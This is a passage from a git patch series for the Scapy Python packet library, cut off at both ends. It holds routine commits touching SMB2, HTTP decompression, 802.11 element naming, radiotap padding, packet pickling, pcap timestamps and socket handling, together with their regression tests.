Command=0x0000, + Flags=0 +) +bind_top_down( + SMB2_Header, + SMB2_Negociate_Protocol_Response_Header, + Command=0x0000, + Flags=2 ** 24 # SMB2_FLAGS_SERVER_TO_REDIR +) bind_layers( SMB2_Negociate_Context, SMB2_Preauth_Integrity_Capabilities, diff --git a/test/smb2.uts b/test/smb2.uts index 3d581fb59e7..051fad6e05c 100644 --- a/test/smb2.uts +++ b/test/smb2.uts @@ -132,6 +132,11 @@ assert netname.ContextType == 0x5 assert netname.DataLength == 28 assert netname.NetName == '192.168.178.21' += test SMB2 Negociate Protocol Request Header - assembling + +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Request_Header() +pkt = IP(raw(pkt)) +assert SMB2_Negociate_Protocol_Request_Header in pkt + SMB2 Negociate Protocol Response Header dissecting @@ -194,3 +199,8 @@ assert comp.CompressionAlgorithmCount == 1 assert len(comp.CompressionAlgorithms) == 1 assert comp.CompressionAlgorithms[0] == 1 += SMB2 Negociate Protocol Response Header assembling + +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Response_Header() +pkt = IP(raw(pkt)) +assert SMB2_Negociate_Protocol_Response_Header in pkt From 9c612d84582d9218c75ce652c7450d3a8d529c94 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 7 Aug 2020 16:37:54 +0200 Subject: [PATCH 0245/1632] Controversial code: to discuss --- scapy/packet.py | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 9e90125565a..1231035032e 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -886,14 +886,8 @@ def guess_payload_class(self, payload): for t in self.aliastypes: for fval, cls in t.payload_guess: try: - for k, v in six.iteritems(fval): - # case where v is a function - if callable(v): - if not v(self.getfieldval(k)): - break - elif v != self.getfieldval(k): - break - else: + if all(v == self.getfieldval(k) + for k, v in six.iteritems(fval)): return cls except AttributeError: pass From 221c6fbc321f34b50da8ed3a30e30bc3d0a65713 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 3 Aug 2020 13:28:14 +0200 Subject: [PATCH 0246/1632] Minor HTTP improvements --- scapy/layers/http.py | 32 ++++++++++++++++++++++---------- scapy/sessions.py | 4 ++-- test/regression.uts | 12 ++++++++++++ 3 files changed, 36 insertions(+), 12 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index fbe25b4ff2b..6e34a02c94e 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -31,7 +31,9 @@ You can turn auto-decompression/auto-compression off with: - >>> conf.contribs["http"]["auto_compression"] = True + >>> conf.contribs["http"]["auto_compression"] = False + +(Defaults to True) """ # This file is a modified version of the former scapy_http plugin. @@ -59,11 +61,9 @@ try: import brotli - is_brotli_available = True + _is_brotli_available = True except ImportError: - is_brotli_available = False - log_loading.info("Can't import brotli. Won't be able to decompress " - "data streams compressed with brotli.") + _is_brotli_available = False if "http" not in conf.contribs: conf.contribs["http"] = {} @@ -310,8 +310,14 @@ def post_dissect(self, s): elif "compress" in encodings: import lzw s = lzw.decompress(s) - elif "br" in encodings and is_brotli_available: - s = brotli.decompress(s) + elif "br" in encodings: + if _is_brotli_available: + s = brotli.decompress(s) + else: + log_loading.info( + "Can't import brotli. brotli decompression " + "will be ignored !" + ) except Exception: # Cannot decompress - probably incomplete data pass @@ -330,8 +336,14 @@ def post_build(self, pkt, pay): elif "compress" in encodings: import lzw pay = lzw.compress(pay) - elif "br" in encodings and is_brotli_available: - pay = brotli.compress(pay) + elif "br" in encodings: + if _is_brotli_available: + pay = brotli.compress(pay) + else: + log_loading.info( + "Can't import brotli. brotli compression will " + "be ignored !" + ) return pkt + pay def self_build(self, field_pos_list=None): @@ -569,7 +581,7 @@ def tcp_reassemble(cls, data, metadata): chunked = ("chunked" in encodings) is_response = isinstance(http_packet.payload, HTTPResponse) if chunked: - detect_end = lambda dat: dat.endswith(b"\r\n\r\n") + detect_end = lambda dat: dat.endswith(b"0\r\n\r\n") # HTTP Requests that do not have any content, # end with a double CRLF elif isinstance(http_packet.payload, HTTPRequest): diff --git a/scapy/sessions.py b/scapy/sessions.py index dd27c4bc615..e6a59247c09 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -240,7 +240,7 @@ def _process_packet(self, pkt): pay = pkt[TCP].payload if isinstance(pay, (NoPayload, conf.padding_layer)): return pkt - new_data = raw(pay) + new_data = pay.original # Match packets by a uniqute TCP identifier seq = pkt[TCP].seq ident = pkt.sprintf(self.fmt) @@ -256,7 +256,7 @@ def _process_packet(self, pkt): pay_class = metadata["pay_class"] # Get a relative sequence number for a storage purpose relative_seq = metadata.get("relative_seq", None) - if not relative_seq: + if relative_seq is None: relative_seq = metadata["relative_seq"] = seq - 1 seq = seq - relative_seq # Add the data to the buffer diff --git a/test/regression.uts b/test/regression.uts index bc27e793772..df96d7073da 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7750,6 +7750,18 @@ for i in range(3, 10): assert HTTP not in pkts[i] assert H2Frame in pkts[i] += Test chunked with gzip + +conf.contribs["http"]["auto_compression"] = False +z = b'\x1f\x8b\x08\x00S\\-_\x02\xff\xb3\xc9(\xc9\xcd\xb1\xcb\xcd)\xb0\xd1\x07\xb3\x00\xe6\xedpt\x10\x00\x00\x00' +a = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=1)/HTTP()/HTTPResponse(Content_Encoding="gzip", Transfer_Encoding="chunked")/(b"5\r\n" + z[:5] + b"\r\n") +b = IP(dst="1.1.1.1", src="2.2.2.2")/TCP(seq=len(a[TCP].payload)+1)/HTTP()/(hex(len(z[5:])).encode()[2:] + b"\r\n" + z[5:] + b"\r\n0\r\n\r\n") +xa, xb = IP(raw(a)), IP(raw(b)) +conf.contribs["http"]["auto_compression"] = True + +c = sniff(offline=[xa, xb], session=TCPSession)[0] +assert gzip_decompress(z) == c.load + ############ ############ + LLMNR protocol From cebd2c0e0d0e5a144839c0ac2c54412dbcf67568 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 9 Aug 2020 14:18:03 +0200 Subject: [PATCH 0247/1632] Fix doc --- scapy/sendrecv.py | 32 ++++++++++++++------------------ 1 file changed, 14 insertions(+), 18 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 8216f6d8d83..05bfeb6a382 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1047,24 +1047,20 @@ def sniff(*args, **kwargs): def bridge_and_sniff(if1, if2, xfrm12=None, xfrm21=None, prn=None, L2socket=None, # noqa: E501 *args, **kargs): """Forward traffic between interfaces if1 and if2, sniff and return -the exchanged packets. - -Arguments: - - if1, if2: the interfaces to use (interface names or opened sockets). - - xfrm12: a function to call when forwarding a packet from if1 to - if2. If it returns True, the packet is forwarded as it. If it - returns False or None, the packet is discarded. If it returns a - packet, this packet is forwarded instead of the original packet - one. - - xfrm21: same as xfrm12 for packets forwarded from if2 to if1. - - The other arguments are the same than for the function sniff(), - except for offline, opened_socket and iface that are ignored. - See help(sniff) for more. - + the exchanged packets. + + :param if1: the interfaces to use (interface names or opened sockets). + :param if2: + :param xfrm12: a function to call when forwarding a packet from if1 to + if2. If it returns True, the packet is forwarded as it. If it + returns False or None, the packet is discarded. If it returns a + packet, this packet is forwarded instead of the original packet + one. + :param xfrm21: same as xfrm12 for packets forwarded from if2 to if1. + + The other arguments are the same than for the function sniff(), + except for offline, opened_socket and iface that are ignored. + See help(sniff) for more. """ for arg in ['opened_socket', 'offline', 'iface']: if arg in kargs: From 63407c5a41c3997fba7492738da1291b89def2ad Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 13 Aug 2020 18:33:01 +0200 Subject: [PATCH 0248/1632] Backward compatibility of 802.11 elements --- scapy/layers/dot11.py | 65 +++++++++++++++++++++++++++++-------------- test/regression.uts | 8 +++++- 2 files changed, 51 insertions(+), 22 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 03bb4db819e..b1b70855a92 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -38,7 +38,6 @@ BitEnumField, BitField, BitMultiEnumField, - BitScalingField, ByteEnumField, ByteField, ConditionalField, @@ -752,7 +751,7 @@ def network_stats(self): p.country_string[-1:] ) elif isinstance(p, Dot11EltRates): - rates = [x.label for x in p.rates] + rates = [(x & 0x7f) / 2. for x in p.rates] if "rates" in summary: summary["rates"].extend(rates) else: @@ -843,6 +842,31 @@ def network_stats(self): 221: "Vendor Specific" } +# Backward compatibility +_dot11_elt_deprecated_names = { + "Rates": 1, + "DSset": 3, + "CFset": 4, + "IBSSset": 6, + "challenge": 16, + "PowerCapability": 33, + "Channels": 36, + "ERPinfo": 42, + "HTinfo": 45, + "RSNinfo": 48, + "ESRates": 50, + "ExtendendCapatibilities": 127, + "VHTCapabilities": 191, + "Vendor": 221, +} + +_dot11_info_elts_ids_rev = {v: k for k, v in _dot11_info_elts_ids.items()} +_dot11_info_elts_ids_rev.update(_dot11_elt_deprecated_names) +_dot11_id_enum = ( + lambda x: _dot11_info_elts_ids.get(x, x), + lambda x: _dot11_info_elts_ids_rev.get(x, x) +) + class Dot11Elt(Packet): """ @@ -850,7 +874,7 @@ class Dot11Elt(Packet): """ __slots__ = ["info"] name = "802.11 Information Element" - fields_desc = [ByteEnumField("ID", 0, _dot11_info_elts_ids), + fields_desc = [ByteEnumField("ID", 0, _dot11_id_enum), FieldLenField("len", None, "info", "B"), StrLenField("info", "", length_from=lambda x: x.len, max_length=255)] @@ -977,7 +1001,7 @@ class Dot11EltRSN(Dot11Elt): name = "802.11 RSN information" match_subclass = True fields_desc = [ - ByteEnumField("ID", 48, _dot11_info_elts_ids), + ByteEnumField("ID", 48, _dot11_id_enum), ByteField("len", None), LEShortField("version", 1), PacketField("group_cipher_suite", RSNCipherSuite(), RSNCipherSuite), @@ -1045,7 +1069,7 @@ class Dot11EltCountry(Dot11Elt): name = "802.11 Country" match_subclass = True fields_desc = [ - ByteEnumField("ID", 7, _dot11_info_elts_ids), + ByteEnumField("ID", 7, _dot11_id_enum), ByteField("len", None), StrFixedLenField("country_string", b"\0\0\0", length=3), PacketListField( @@ -1063,28 +1087,27 @@ class Dot11EltCountry(Dot11Elt): ] -class RateElement(Packet): - name = "Rate element" - fields_desc = [ - BitField("mandatory", 0, 1), - BitScalingField("label", 0, 7, scaling=0.5, unit="Mbps"), - ] - - def extract_padding(self, s): - return b'', s +class _RateField(ByteField): + def i2repr(self, pkt, val): + if val is None: + return "" + s = str((val & 0x7f) / 2.) + if val & 0x80: + s += "(B)" + return s + " Mbps" class Dot11EltRates(Dot11Elt): name = "802.11 Rates" match_subclass = True fields_desc = [ - ByteEnumField("ID", 1, _dot11_info_elts_ids), + ByteEnumField("ID", 1, _dot11_id_enum), ByteField("len", None), - PacketListField( + FieldListField( "rates", - [], - RateElement, - count_from=lambda p: p.len + [0x82], + _RateField("", 0), + length_from=lambda p: p.len ) ] @@ -1096,7 +1119,7 @@ class Dot11EltHTCapabilities(Dot11Elt): name = "HT Capabilities" match_subclass = True fields_desc = [ - ByteEnumField("ID", 45, _dot11_info_elts_ids), + ByteEnumField("ID", 45, _dot11_id_enum), ByteField("len", None), # HT Capabilities Info: 2B BitField("L_SIG_TXOP_Protection", 0, 1, tot_size=-2), @@ -1177,7 +1200,7 @@ class Dot11EltVendorSpecific(Dot11Elt): name = "802.11 Vendor Specific" match_subclass = True fields_desc = [ - ByteEnumField("ID", 221, _dot11_info_elts_ids), + ByteEnumField("ID", 221, _dot11_id_enum), ByteField("len", None), X3BytesField("oui", 0x000000), StrLenField("info", "", length_from=lambda x: x.len - 3) diff --git a/test/regression.uts b/test/regression.uts index df96d7073da..d4ff053367d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1311,7 +1311,7 @@ assert Dot11FCS in radiotap assert radiotap.fcs == 0xdbc04908 assert Dot11EltRates in radiotap -assert [x.label for x in radiotap[Dot11EltRates].rates] == [1.0, 2.0, 5.5, 11.0, 18.0, 24.0, 36.0, 54.0] +assert radiotap[Dot11EltRates].rates == [130, 132, 139, 150, 36, 48, 72, 108] = RadioTap - Build with Extended presence mask @@ -12440,6 +12440,12 @@ assert f[Dot11EltRSN].pmkids.nb_pmkids == 1 assert len(f[Dot11EltRSN].pmkids.pmkid_list) == 1 assert f[Dot11EltRSN].pmkids.pmkid_list[0] == b'LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x11' += Backward compatibility of Dot11Elt + +# Old naming scheme +assert Dot11Elt(ID="DSset").sprintf("%ID%") == 'DSSS Set' +assert Dot11Elt(ID="RSNinfo").sprintf("%ID%") == 'RSN' + ###################################### # More PPI tests in contrib/ppi_cace # From fd8a7b9b6c7cd94f95688293dce4f7732027e25e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 17 Aug 2020 16:03:47 +0200 Subject: [PATCH 0249/1632] Improve packet pickling --- scapy/packet.py | 28 +++++++++++++++++----------- test/regression.uts | 14 ++++++++++---- 2 files changed, 27 insertions(+), 15 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 1231035032e..6154caeffd3 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -103,18 +103,16 @@ def lower_bonds(self): for lower, fval in six.iteritems(self._overload_fields): print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 - def _unpickle(self, dlist): - """Used to unpack pickling""" - self.__init__(b"".join(dlist)) - return self - def __reduce__(self): """Used by pickling methods""" - return (self.__class__, (), (self.build(),)) - - def __reduce_ex__(self, proto): - """Used by pickling methods""" - return self.__reduce__() + return (self.__class__, (), ( + self.build(), + self.time, + self.sent_time, + self.direction, + self.sniffed_on, + self.wirelen, + )) def __getstate__(self): """Mark object as pickable""" @@ -122,7 +120,13 @@ def __getstate__(self): def __setstate__(self, state): """Rebuild state using pickable methods""" - return self._unpickle(state) + self.__init__(state[0]) + self.time = state[1] + self.sent_time = state[2] + self.direction = state[3] + self.sniffed_on = state[4] + self.wirelen = state[5] + return self def __deepcopy__(self, memo): """Used by copy.deepcopy""" @@ -148,6 +152,8 @@ def __init__(self, _pkt=b"", post_transform=None, _internal=0, _underlayer=None, self.raw_packet_cache = None self.raw_packet_cache_fields = None self.wirelen = None + self.direction = None + self.sniffed_on = None if _pkt: self.dissect(_pkt) if not _internal: diff --git a/test/regression.uts b/test/regression.uts index d4ff053367d..15f2674af11 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -13267,13 +13267,19 @@ if PYX and not six.PY2: import pickle frm = Ether(src='00:11:22:33:44:55', dst='00:22:33:44:55:66')/Raw() +frm.time = EDecimal(123.45) +frm.sniffed_on = "iface" +frm.wirelen = 1 pl = PacketList(res=[frm, frm], name='WhatAGreatName') pickled = pickle.dumps(pl) pl = pickle.loads(pickled) -assert(pl.listname == "WhatAGreatName") -assert(len(pl) == 2) -assert(pl[0][Ether].src == '00:11:22:33:44:55') -assert(pl[1][Ether].dst == '00:22:33:44:55:66') +assert pl.listname == "WhatAGreatName" +assert len(pl) == 2 +assert pl[0].time == 123.45 +assert pl[0].sniffed_on == "iface" +assert pl[0].wirelen == 1 +assert pl[0][Ether].src == '00:11:22:33:44:55' +assert pl[1][Ether].dst == '00:22:33:44:55:66' ############ From 551cc0b5fce94694084440cb8e14d2ccc8ec2859 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 17 Aug 2020 17:33:08 +0200 Subject: [PATCH 0250/1632] Fix MCS alignment --- scapy/layers/dot11.py | 123 ++++++++++++++++++++++-------------------- test/regression.uts | 12 +++++ 2 files changed, 78 insertions(+), 57 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index b1b70855a92..38cc568073e 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -24,7 +24,6 @@ """ from __future__ import print_function -import math import re import struct from zlib import crc32 @@ -147,22 +146,8 @@ def answers(self, other): # https://www.radiotap.org/ - -class _RadiotapReversePadField(ReversePadField): - def __init__(self, fld): - # Quote from https://www.radiotap.org/: - # ""Radiotap requires that all fields in the radiotap header are aligned to natural boundaries. # noqa: E501 - # For radiotap, that means all 8-, 16-, 32-, and 64-bit fields must begin on 8-, 16-, 32-, and 64-bit boundaries, respectively."" # noqa: E501 - if isinstance(fld, BitField): - _align = int(math.ceil(fld.i2len(None, None))) - else: - _align = struct.calcsize(fld.fmt) - ReversePadField.__init__( - self, - fld, - _align, - padwith=b"\x00" - ) +# Note: Radiotap alignment is crazy. See the doc: +# https://www.radiotap.org/#alignment-in-radiotap def _next_radiotap_extpm(pkt, lst, cur, s): @@ -287,68 +272,76 @@ class RadioTap(Packet): FlagsField('present', None, -32, _rt_present), # noqa: E501 # Extended presence mask ConditionalField(PacketListField("Ext", [], next_cls_cb=_next_radiotap_extpm), lambda pkt: pkt.present and pkt.present.Ext), # noqa: E501 - # RadioTap fields - each starts with a _RadiotapReversePadField + # RadioTap fields - each starts with a ReversePadField # to handle padding # TSFT ConditionalField( - _RadiotapReversePadField( - LELongField("mac_timestamp", 0) + ReversePadField( + LELongField("mac_timestamp", 0), + 8 ), lambda pkt: pkt.present and pkt.present.TSFT), # Flags ConditionalField( - _RadiotapReversePadField( - FlagsField("Flags", None, -8, _rt_flags) - ), + FlagsField("Flags", None, -8, _rt_flags), lambda pkt: pkt.present and pkt.present.Flags), # Rate ConditionalField( - _RadiotapReversePadField( - ScalingField("Rate", 0, scaling=0.5, - unit="Mbps", fmt="B")), + ScalingField("Rate", 0, scaling=0.5, + unit="Mbps", fmt="B"), lambda pkt: pkt.present and pkt.present.Rate), # Channel ConditionalField( - _RadiotapReversePadField(LEShortField("ChannelFrequency", 0)), + ReversePadField( + LEShortField("ChannelFrequency", 0), + 2 + ), lambda pkt: pkt.present and pkt.present.Channel), ConditionalField( FlagsField("ChannelFlags", None, -16, _rt_channelflags), lambda pkt: pkt.present and pkt.present.Channel), # dBm_AntSignal ConditionalField( - _RadiotapReversePadField( - ScalingField("dBm_AntSignal", 0, offset=-256, - unit="dBm", fmt="B")), + ScalingField("dBm_AntSignal", 0, offset=-256, + unit="dBm", fmt="B"), lambda pkt: pkt.present and pkt.present.dBm_AntSignal), # dBm_AntNoise ConditionalField( - _RadiotapReversePadField( - ScalingField("dBm_AntNoise", 0, offset=-256, - unit="dBm", fmt="B")), + ScalingField("dBm_AntNoise", 0, offset=-256, + unit="dBm", fmt="B"), lambda pkt: pkt.present and pkt.present.dBm_AntNoise), # Lock_Quality ConditionalField( - _RadiotapReversePadField(LEShortField("Lock_Quality", 0)), + ReversePadField( + LEShortField("Lock_Quality", 0), + 2 + ), lambda pkt: pkt.present and pkt.present.Lock_Quality), # Antenna ConditionalField( - _RadiotapReversePadField(ByteField("Antenna", 0)), + ByteField("Antenna", 0), lambda pkt: pkt.present and pkt.present.Antenna), # RX Flags ConditionalField( - _RadiotapReversePadField( - FlagsField("RXFlags", None, -16, _rt_rxflags)), + ReversePadField( + FlagsField("RXFlags", None, -16, _rt_rxflags), + 2 + ), lambda pkt: pkt.present and pkt.present.RXFlags), # TX Flags ConditionalField( - _RadiotapReversePadField( - FlagsField("TXFlags", None, -16, _rt_txflags)), + ReversePadField( + FlagsField("TXFlags", None, -16, _rt_txflags), + 2 + ), lambda pkt: pkt.present and pkt.present.TXFlags), # ChannelPlus ConditionalField( - _RadiotapReversePadField( - FlagsField("ChannelPlusFlags", None, -32, _rt_channelflags2)), + ReversePadField( + FlagsField("ChannelPlusFlags", None, -32, _rt_channelflags2), + 4 + ), lambda pkt: pkt.present and pkt.present.ChannelPlus), ConditionalField( LEShortField("ChannelPlusFrequency", 0), @@ -358,8 +351,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.ChannelPlus), # MCS ConditionalField( - _RadiotapReversePadField( - FlagsField("knownMCS", None, -8, _rt_knownmcs)), + ReversePadField( + FlagsField("knownMCS", None, -8, _rt_knownmcs), + 4 + ), lambda pkt: pkt.present and pkt.present.MCS), ConditionalField( BitField("Ness_LSB", 0, 1), @@ -384,16 +379,20 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.MCS), # A_MPDU ConditionalField( - _RadiotapReversePadField( - LEIntField("A_MPDU_ref", 0)), + ReversePadField( + LEIntField("A_MPDU_ref", 0), + 4 + ), lambda pkt: pkt.present and pkt.present.A_MPDU), ConditionalField( FlagsField("A_MPDU_flags", None, -32, _rt_a_mpdu_flags), lambda pkt: pkt.present and pkt.present.A_MPDU), # VHT ConditionalField( - _RadiotapReversePadField( - FlagsField("KnownVHT", None, -16, _rt_knownvht)), + ReversePadField( + FlagsField("KnownVHT", None, -16, _rt_knownvht), + 2 + ), lambda pkt: pkt.present and pkt.present.VHT), ConditionalField( FlagsField("PresentVHT", None, -8, _rt_presentvht), @@ -412,8 +411,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.VHT), # timestamp ConditionalField( - _RadiotapReversePadField( - LELongField("timestamp", 0)), + ReversePadField( + LELongField("timestamp", 0), + 8 + ), lambda pkt: pkt.present and pkt.present.timestamp), ConditionalField( LEShortField("ts_accuracy", 0), @@ -426,8 +427,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.timestamp), # HE - XXX not complete ConditionalField( - _RadiotapReversePadField( - ShortField("he_data1", 0)), + ReversePadField( + ShortField("he_data1", 0), + 2 + ), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( ShortField("he_data2", 0), @@ -446,8 +449,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.HE), # HE_MU ConditionalField( - _RadiotapReversePadField( - LEShortField("hemu_flags1", 0)), + ReversePadField( + LEShortField("hemu_flags1", 0), + 2 + ), lambda pkt: pkt.present and pkt.present.HE_MU), ConditionalField( LEShortField("hemu_flags2", 0), @@ -462,8 +467,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.HE_MU), # HE_MU_other_user ConditionalField( - _RadiotapReversePadField( - LEShortField("hemuou_per_user_1", 0x7fff)), + ReversePadField( + LEShortField("hemuou_per_user_1", 0x7fff), + 2 + ), lambda pkt: pkt.present and pkt.present.HE_MU_other_user), ConditionalField( LEShortField("hemuou_per_user_2", 0x003f), @@ -477,8 +484,10 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.HE_MU_other_user), # L_SIG ConditionalField( - _RadiotapReversePadField( - FlagsField("lsig_data1", 0, -16, ["rate", "length"])), + ReversePadField( + FlagsField("lsig_data1", 0, -16, ["rate", "length"]), + 2 + ), lambda pkt: pkt.present and pkt.present.L_SIG), ConditionalField( BitField("lsig_length", 0, 12), diff --git a/test/regression.uts b/test/regression.uts index d4ff053367d..c3e7a77caad 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12433,6 +12433,18 @@ assert f.ASEL.Explicit_CSI_Feedback_Based_Transmit_ASEL assert f.ASEL.Antenna_Selection assert f.ASEL == 63 += RadioTap - MCS weird padding +f = RadioTap(b'\x00\x00,\x00K\x08\x1c\x00"b\x96\x03\x00\x00\x00\x00\x10\x00l\t\x80\x04\xb0\x00\x80\x04\x01\x00l\t\x01\x00\x1f\x08\x0c\x00\x94\x05\x00\x00\x04\x00\x00\x00\x88\x020\x00.\xdf\xc4J\xb0\xdc\xa0c\x91sf\xech\x05\xca?\xf4h@Y\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x00E\x00\x05\xdc \xcf@\x00\x80\x06P\xf0\xc0\xa8\x01\n\xc0\xa8\x01\x02\xdb\x8f\x13\x89\xfbv\xa3\xde\xf6\xd8L\xe8P\x10\xff\xfft\xdd\x00\x0023456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901O\xdc\x01x') +assert f.knownMCS == 31 +assert f.Ness_LSB == 0 +assert f.STBC_streams == 0 +assert f.FEC_type == 0 +assert f.HT_format == 1 +assert f.guard_interval == 0 +assert f.MCS_bandwidth == 0 +assert f.MCS_index == 0xc +assert f.A_MPDU_ref == 1428 + = Reassociation request f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') assert Dot11EltRSN in f From 7927f3c8d2d209c33416f349795b22c19471015b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 17 Aug 2020 16:16:20 +0200 Subject: [PATCH 0251/1632] Properly save sent_time in pcaps --- scapy/utils.py | 8 +++++++- test/regression.uts | 11 +++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 2c6232b803f..e3308b4fde5 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1423,7 +1423,13 @@ def write(self, pkt): # Import here to avoid a circular dependency from scapy.plist import SndRcvList if isinstance(pkt, SndRcvList): - pkt = (p for t in pkt for p in t) + def _iter(pkt=pkt): + for s, r in pkt: + if s.sent_time: + s.time = s.sent_time + yield s + yield r + pkt = _iter() else: pkt = pkt.__iter__() for p in pkt: diff --git a/test/regression.uts b/test/regression.uts index d4ff053367d..0454a060234 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -7138,6 +7138,17 @@ assert newpktpcapwirelen[0].wirelen is not None assert len(newpktpcapwirelen[0]) < newpktpcapwirelen[0].wirelen assert newpktpcapwirelen[0].wirelen == pktpcapwirelen[0].wirelen += Check wrpcap() then rdpcap() with sent_time on SndRcvList +f = get_temp_file() +s = Ether()/IP() +r = Ether()/IP() +s.sent_time = 1 +r.time = 2 +wrpcap(f, SndRcvList([(s, r)])) +pcap = rdpcap(f) +assert pcap[0].time == 1 +assert pcap[1].time == 2 + = Check wrpcap() fdesc, filename = tempfile.mkstemp() fdesc = os.fdopen(fdesc, "wb") From b4a85b8475f7c01501c174fc9188dcd268d23fde Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 17 Aug 2020 18:12:47 +0200 Subject: [PATCH 0252/1632] Remove unused read_allowed_exceptions --- scapy/arch/windows/native.py | 5 ++++- scapy/automaton.py | 2 -- scapy/layers/can.py | 1 - scapy/sendrecv.py | 7 ------- scapy/supersocket.py | 1 - scapy/utils.py | 1 - 6 files changed, 4 insertions(+), 13 deletions(-) diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 18a3ea54f15..c0c353bbc45 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -151,7 +151,10 @@ def send(self, x): self.outs.sendto(data, (dst_ip, 0)) def nonblock_recv(self, x=MTU): - return self.recv() + try: + return self.recv() + except IOError: + return None # https://docs.microsoft.com/en-us/windows/desktop/winsock/tcp-ip-raw-sockets-2 # noqa: E501 # - For IPv4 (address family of AF_INET), an application receives the IP diff --git a/scapy/automaton.py b/scapy/automaton.py index 1686038855b..6ef3d886955 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -197,8 +197,6 @@ def select_objects(inputs, remain): class ObjectPipe(SelectableObject): - read_allowed_exceptions = () - def __init__(self): self.closed = False self.rd, self.wr = os.pipe() diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 23b0045082d..8cc1ad3ac3e 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -327,7 +327,6 @@ def rdcandump(filename, count=-1, interface=None): class CandumpReader: """A stateful candump reader. Each packet is returned as a CAN packet""" - read_allowed_exceptions = () # emulate SuperSocket nonblocking_socket = True def __init__(self, filename, interface=None): diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 05bfeb6a382..226eecd4eaf 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -904,7 +904,6 @@ def _write_to_pcap(packets_list): # Get select information from the sockets _main_socket = next(iter(sniff_sockets)) - read_allowed_exceptions = _main_socket.read_allowed_exceptions select_func = _main_socket.select _backup_read_func = _main_socket.__class__.recv nonblocking_socket = _main_socket.nonblocking_socket @@ -914,10 +913,6 @@ def _write_to_pcap(packets_list): "The used select function " "will be the one of the first socket") - # Fill if empty - if not read_allowed_exceptions: - read_allowed_exceptions = (IOError,) - if nonblocking_socket: # select is non blocking def stop_cb(): @@ -967,8 +962,6 @@ def stop_cb(): pass dead_sockets.append(s) continue - except 